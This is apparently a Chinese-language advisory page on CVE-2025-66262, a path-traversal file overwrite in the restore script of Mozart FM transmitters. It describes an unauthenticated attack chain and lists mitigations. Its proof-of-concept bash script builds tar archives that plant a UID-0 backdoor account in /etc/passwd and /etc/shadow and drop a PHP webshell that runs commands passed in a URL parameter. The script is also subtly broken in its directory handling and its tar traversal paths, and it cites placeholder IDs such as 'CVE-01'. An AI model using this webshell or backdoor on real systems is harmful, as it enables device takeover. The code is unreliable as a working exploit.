CVE-2025-66262: DB Electronica Mozart FM Transmitter 任意文件覆盖漏洞

漏洞信息

漏洞编号

CVE-2025-66262

漏洞类型

任意文件写入/路径遍历

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter (版本30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000)

漏洞概述

CVE-2025-66262是DB Electronica Telecomunicazioni S.p.A.生产的Mozart FM发射器设备中的一个严重安全漏洞。该漏洞存在于restore_mozzi_memories.sh脚本中，该脚本在处理用户上传的tar归档文件时存在路径遍历问题。脚本使用-C /参数将tar文件内容直接提取到文件系统根目录，而不进行任何路径验证或安全检查。由于Mozart FM Transmitter设备存在多个未认证文件上传漏洞（CVE-01, CVE-06, CVE-07），攻击者可以无需任何认证即可上传恶意构造的.tar.gz归档文件。通过在归档中包含带有路径遍历序列（如../../etc/shadow）的文件名，攻击者可以将文件写入到任意系统目录，从而实现对关键系统文件的覆盖和替换，最终可能导致完全的系统 compromise，获得最高权限访问。CVSS评分高达9.8，属于紧急严重级别。

技术细节

该漏洞的技术根源在于restore_mozzi_memories.sh脚本的不安全设计。脚本接受用户上传的tar归档文件并使用tar命令的-C /选项将其内容提取到根目录。问题在于：1）脚本未对归档内的文件名进行任何清理或验证；2）-C /参数强制将文件提取到根目录，绕过了正常的安全边界；3）tar格式允许文件名包含../等路径遍历序列。当攻击者上传一个精心构造的.tar.gz文件时，文件内的条目可能包含如etc/shadow、var/www/html/index.php等路径，tar命令会忠实地将这些文件写入到目标位置。攻击者可以覆写/etc/passwd或/etc/shadow来创建后门账户，或替换Web应用文件来植入恶意代码。结合文件上传漏洞，攻击者可以在无需认证的情况下完成整个攻击链，从文件上传到任意文件写入再到代码执行。

攻击链分析

STEP 1

步骤1

发现目标设备：识别运行存在漏洞的restore_mozzi_memories.sh脚本的Mozart FM Transmitter设备

STEP 2

步骤2

利用文件上传漏洞：利用CVE-01、CVE-06或CVE-07等未认证文件上传漏洞，将恶意构造的.tar.gz归档文件上传到设备

STEP 3

步骤3

构造恶意归档：创建包含路径遍历文件名的tar归档，如包含etc/../../../etc/shadow或var/www/index.php等路径的条目

STEP 4

步骤4

触发restore功能：调用restore_mozzi_memories.sh脚本或相关恢复功能，上传并提取恶意tar归档

STEP 5

步骤5

文件覆写：restore_mozzi_memories.sh使用tar -C /提取文件，由于路径遍历，恶意文件被写入到/etc/shadow、/var/www/html/index.php等系统关键位置

STEP 6

步骤6

获得系统控制权：覆写/etc/shadow创建后门账户，或替换Web文件植入webshell，实现远程代码执行和完全系统 compromise

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-66262 PoC - Malicious tar archive creation
# Target: DB Electronica Mozart FM Transmitter

# Create a directory for the exploit
mkdir -p exploit_archive

# Create a malicious passwd file (backdoor account)
cat > exploit_archive/etc/passwd << 'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
backdoor:$1$evil$Sr5fDJhX3n5gOQjK1kXjK0:0:0:backdoor:/root:/bin/bash
EOF

# Create a malicious shadow file
cat > exploit_archive/etc/shadow << 'EOF'
root:$6$evil$8W4vRf5xH3n5gOQjK1kXjK0:19400:0:99999:7:::
backdoor:$6$evil$8W4vRf5xH3n5gOQjK1kXjK0:19400:0:99999:7:::
EOF

# Create a malicious index.php for web shell
cat > exploit_archive/var/www/html/index.php << 'EOF'
<?php
if(isset($_GET['cmd'])) {
    echo '<pre>';
    system($_GET['cmd']);
    echo '</pre>';
}
?>
EOF

# Create the malicious tar archive with path traversal
cd exploit_archive
tar -czf ../malicious_backup.tgz etc/../../../etc/passwd
tar -czf ../malicious_backup2.tgz var/../../var/www/html/index.php

# Alternative: Create archive that extracts to root using symlinks
mkdir -p exploit_archive/etc
cd exploit_archive
ln -sf ../../../etc/shadow etc/shadow
tar -czf ../malicious_symlink.tgz etc/shadow

# Cleanup
cd ..
rm -rf exploit_archive

echo "Malicious archives created:"
echo "- malicious_backup.tgz"
echo "- malicious_backup2.tgz"
echo "- malicious_symlink.tgz"
echo ""
echo "Upload one of these files via the restore functionality"
echo "to trigger CVE-2025-66262"

影响范围

Mozart FM Transmitter 30

Mozart FM Transmitter 50

Mozart FM Transmitter 100

Mozart FM Transmitter 300

Mozart FM Transmitter 500

Mozart FM Transmitter 1000

Mozart FM Transmitter 2000

Mozart FM Transmitter 3000

Mozart FM Transmitter 3500

Mozart FM Transmitter 6000

Mozart FM Transmitter 7000

防御指南

临时缓解措施

在厂商发布官方修复补丁之前，建议采取以下临时缓解措施：1）禁用或限制restore_mozzi_memories.sh脚本的执行权限；2）通过网络访问控制列表（ACL）限制对设备管理接口的访问，仅允许受信任的管理IP访问；3）监控文件系统变化，特别是/etc/shadow、/var/www等关键目录；4）如果restore功能非必需，可考虑暂时禁用该功能；5）部署入侵检测系统（IDS）监控异常的tar提取行为和路径遍历尝试；6）定期审计系统账户和Web文件完整性。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66262
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66262
3 Details https://www.cvedetails.com/cve/CVE-2025-66262/
4 VulDB https://vuldb.com/cve/CVE-2025-66262
5 Link https://www.abdulmhsblog.com/posts/webfmvulns/